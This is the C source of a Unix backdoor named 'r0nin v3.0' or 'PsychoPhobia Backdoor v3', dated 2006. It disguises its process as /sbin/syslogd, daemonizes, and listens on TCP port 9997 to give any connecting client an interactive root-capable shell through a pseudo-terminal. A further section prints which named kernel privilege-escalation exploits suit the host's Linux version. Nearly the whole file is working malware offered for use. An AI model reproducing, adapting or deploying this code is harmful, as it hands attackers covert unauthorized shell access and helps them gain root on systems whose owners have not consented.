/* r0nin v3.0 by m0rtix */ ////////////////////////////////////////////////////////////////// // Bind port, "ps aux" masked, Tell u if rootab or no etc... // // // // m0rtix (c) 2006 // // irc.epiknet.org #hakin9 // // // // Une petite pensée pour Sympt0me.... // //reloaded_matrix_revolutions@hotmail.com // ////////////////////////////////////////////////////////////////// #include #include #include #include #include #include #include #include #include #include #include #include #include #define MASK "/sbin/syslogd" #define HOME "/" #define TIOCSCTTY 0x540E #define TIOCGWINSZ 0x5413 #define TIOCSWINSZ 0x5414 #define ECHAR 0x1d #define BUF 32768 #define PORT 9997 int leserver(void); int rootab(void); int noroot(void); int kwst(void); int oslinux(void); int bsdbsd(void); int main(int argc, char *argv[]) { //have the current user in bash !!! int uid = getuid(); struct passwd *pwd_str; pwd_str = getpwuid(uid); char *login; login = malloc(strlen(pwd_str->pw_name)); strncpy(login, pwd_str->pw_name, strlen(pwd_str->pw_name)); //have the current kernel version !!!! struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname)); int test; if(test = uname(bof)) { printf("Error %i\n", test); exit(1); } //to be hidden for "PS" command: strcpy(argv[0], MASK); fprintf(stdout, "\n\t ,--. | o "); fprintf(stdout, "\n\t,-.-.| |,---.|--- .. , "); fprintf(stdout, "\n\t| | || || | | >< "); fprintf(stdout, "\n\t` ' '`--'` `---'`' ` \n"); fprintf(stdout, "\nPsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = %ld\n", (long)getpid()); fprintf(stdout, "Shell on: 9997 User: %s UID: %ld\n", login, (long)getuid()); fprintf(stdout, "Name: %s (Masked in PS! ) v: = %s %s %s\n\n", argv[0], bof->sysname, bof->nodename, bof->release); kwst(); leserver(); return 0; } ////////////////////////////// //LESERVER - listen on 9997 port and give U a shell... struct winsize { unsigned short ws_row; unsigned short ws_col; unsigned short ws_xpixel; unsigned short ws_ypixel; }; /////////////////////////////////////////////////: void get_tty(int num, char *base, char *buf) { char series[] = "pqrstuvwxyzabcde"; char subs[] = "0123456789abcdef"; int pos = strlen(base); strcpy(buf, base); buf[pos] = series[(num >> 4) & 0xF]; buf[pos+1] = subs[num & 0xF]; buf[pos+2] = 0; } ///////////////////////////////////////////// int open_tty(int *tty, int *pty) { char buf[512]; int i, fd; fd = open("/dev/ptmx", O_RDWR); close(fd); for (i=0; i < 256; i++) { get_tty(i, "/dev/pty", buf); *pty = open(buf, O_RDWR); if (*pty < 0) continue; get_tty(i, "/dev/tty", buf); *tty = open(buf, O_RDWR); if (*tty < 0) { close(*pty); continue; } return 1; } return 0; } /////////////////////////////////////////////////// void sig_child(int i) { signal(SIGCHLD, sig_child); waitpid(-1, NULL, WNOHANG); } //////////////////////////////////////////////////: void hangout(int i) { kill(0, SIGHUP); kill(0, SIGTERM); } ///////////////////////////////////////////////////// int leserver(void) { int pid; struct sockaddr_in serv; struct sockaddr_in cli; int sock; sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock < 0) { perror("socket"); return 1; } bzero((char *) &serv, sizeof(serv)); serv.sin_family = AF_INET; serv.sin_addr.s_addr = htonl(INADDR_ANY); serv.sin_port = htons(port); if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) { perror("bind"); return 1; } if (listen(sock, 5) < 0) { perror("listen"); return 1; } /* daemonize */ setsid(); chdir("/"); pid = open("/dev/null", O_RDWR); dup2(pid, 0); dup2(pid, 1); dup2(pid, 2); close(pid); signal(SIGHUP, SIG_IGN); signal(SIGCHLD, sig_child); while (1) { int scli; int slen; slen = sizeof(cli); scli = accept(sock, (struct sockaddr *) &cli, &slen); if (scli < 0) continue; pid = fork(); if (pid == 0) { int subshell; int tty; int pty; fd_set fds; char buf[BUF]; char *argv[] = {"sh", "-i", NULL}; #define MAXENV 256 #define ENVLEN 256 char *envp[MAXENV]; char envbuf[(MAXENV+2) * ENVLEN]; int j, i; char home[256]; /* setup enviroment */ envp[0] = home; sprintf(home, "HOME=%s", HOME); j = 0; do { i = read(scli, &envbuf[j * ENVLEN], ENVLEN); envp[j+1] = &envbuf[j * ENVLEN]; j++; if ((j >= MAXENV) || (i < ENVLEN)) break; } while (envbuf[(j-1) * ENVLEN] != '\n'); envp[j+1] = NULL; /* create new group */ setpgid(0, 0); /* open slave & master side of tty */ if (!open_tty(&tty, &pty)) { char msg[] = "Can't fork pty, bye!\n"; write(scli, msg, strlen(msg)); close(scli); exit(0); } /* fork child */ subshell = fork(); if (subshell == 0) { /* close master */ close(pty); /* attach tty */ setsid(); ioctl(tty, TIOCSCTTY); /* close local part of connection */ close(scli); close(sock); signal(SIGHUP, SIG_DFL); signal(SIGCHLD, SIG_DFL); dup2(tty, 0); dup2(tty, 1); dup2(tty, 2); close(tty); execve("/bin/sh", argv, envp); } /* close slave */ close(tty); signal(SIGHUP, hangout); signal(SIGTERM, hangout); while (1) { /* watch tty and client side */ FD_ZERO(&fds); FD_SET(pty, &fds); FD_SET(scli, &fds); if (select((pty > scli) ? (pty+1) : (scli+1), &fds, NULL, NULL, NULL) < 0) { break; } if (FD_ISSET(pty, &fds)) { int count; count = read(pty, buf, BUF); if (count <= 0) break; if (write(scli, buf, count) <= 0) break; } if (FD_ISSET(scli, &fds)) { int count; unsigned char *p, *d; d = buf; count = read(scli, buf, BUF); if (count <= 0) break; /* setup win size */ p = memchr(buf, ECHAR, count); if (p) { unsigned char wb[5]; int rlen = count - ((ulong) p - (ulong) buf); struct winsize ws; /* wait for rest */ if (rlen > 5) rlen = 5; memcpy(wb, p, rlen); if (rlen < 5) { read(scli, &wb[rlen], 5 - rlen); } /* setup window */ ws.ws_xpixel = ws.ws_ypixel = 0; ws.ws_col = (wb[1] << 8) + wb[2]; ws.ws_row = (wb[3] << 8) + wb[4]; ioctl(pty, TIOCSWINSZ, &ws); kill(0, SIGWINCH); /* write the rest */ write(pty, buf, (ulong) p - (ulong) buf); rlen = ((ulong) buf + count) - ((ulong)p+5); if (rlen > 0) write(pty, p+5, rlen); } else if (write(pty, d, count) <= 0) break; } } close(scli); close(sock); close(pty); waitpid(subshell, NULL, 0); vhangup(); exit(0); } close(scli); } } //////////////////////////////////////////////////////////////////////// //END LESERVER ///////////////////////////////////// //KWST - rootab ?????????? int kwst(void) { struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname)); int test; if(test = uname(bof)) { printf("Error %i\n", test); exit(1); } char *osdev = bof->sysname; if (strcmp(osdev, "Linux") == 0) oslinux(); else { if(strcmp(osdev, "FreeBSD") == 0) { bsdbsd(); }} return 0; } //END KWST ////////////////////////////////////// //OSLINUX - if is Linux: int oslinux(void) { ///////////////// THanks to Anissina_Keiko /////////////////////////////// struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname)); int test; if(test = uname(bof)) { printf("Error %i\n", test); exit(1); } char *kernelver = bof->release; //////////////////////////////////////////// KERNEL 2.2.* ////////////////// if (strncmp(kernelver, "2.2.", 4) == 0) { printf("\nRootab !! use: ptrace!"); } //////////////////////////////////////////// KERNEL 2.4.* ////////////////// else if(strncmp(kernelver, "2.4.17", 6) == 0) { printf("\nRootab !! use: Kmod, newlocal !"); } else if (strncmp(kernelver, "2.4.18", 6) == 0) { printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !"); } else if (strncmp(kernelver, "2.4.19", 6) == 0) { printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !"); } else if (strncmp(kernelver, "2.4.20", 6) == 0) { printf("\nRootab !! use: elflbl, Ptrace, Brk2, w00t(if 2003), Kmod or Kmod2 !"); } else if (strncmp(kernelver, "2.4.21", 6) == 0) { printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Krad3(if elSMP), Kmod2 !"); } else if (strncmp(kernelver, "2.4.22", 6) == 0) { printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Kmod2 !"); } else if (strncmp(kernelver, "2.4.23", 6) == 0) { printf("\nRootab !! use: mremap_pte!"); } else if (strncmp(kernelver, "2.4.24", 6) == 0) { printf("\nRootab !! use: mremap_pte!"); } else if (strncmp(kernelver, "2.4.25", 6) == 0) { printf("\nRootab !! use: mremap_pte, Uselib24!"); } else if (strncmp(kernelver, "2.4.26", 6) == 0) { printf("\nRootab !! use: mremap_pte, Uselib24!"); } else if (strncmp(kernelver, "2.4.27", 6) == 0) { printf("Rootab !! use: don't know lol!\n"); } //////////////////////////////////////////////////// KERNEL 2.6.* /////////////////// else if (strncmp(kernelver, "2.6.2", 5) == 0) { printf("\nRootab !! use: expand_stack, mremap_pte!"); } else if (strncmp(kernelver, "2.6.3", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); } else if (strncmp(kernelver, "2.6.4", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); } else if (strncmp(kernelver, "2.6.5", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); } else if (strncmp(kernelver, "2.6.6", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); } else if (strncmp(kernelver, "2.6.7", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); } else if (strncmp(kernelver, "2.6.8", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); } else if (strncmp(kernelver, "2.6.9", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !"); } else if (strncmp(kernelver, "2.6.10", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !"); } else if (strncmp(kernelver, "2.6.11", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad2(if 2004), Krad3 !"); } else if (strncmp(kernelver, "2.6.12", 5) == 0) { printf("\nRootab !! use: expand_stack, Krad2(if 2004) !"); } else if (strncmp(kernelver, "2.6.13", 5) == 0) { printf("\nRootab !! use: expand_stack !"); } else if (strncmp(kernelver, "2.6.14", 5) == 0) { printf("\nRootab !! use: expand_stack !"); } else if (strncmp(kernelver, "2.6.15", 5) == 0) { printf("\nRootab !! use: expand_stack !"); } else { printf("\nDon't know for ths version: %s\n", kernelver); } return 0; } //END OS ///////////////////////////////////////// //BSDBSD If FreeBSD: int bsdbsd(void) { fprintf(stdout, "\n\t Oh NOoo !!! it's a FreeBSD system, i can't say you if this sheat is rootab !!\n\n"); return 0; } //BSDBSD END ////////////////////////////////////////////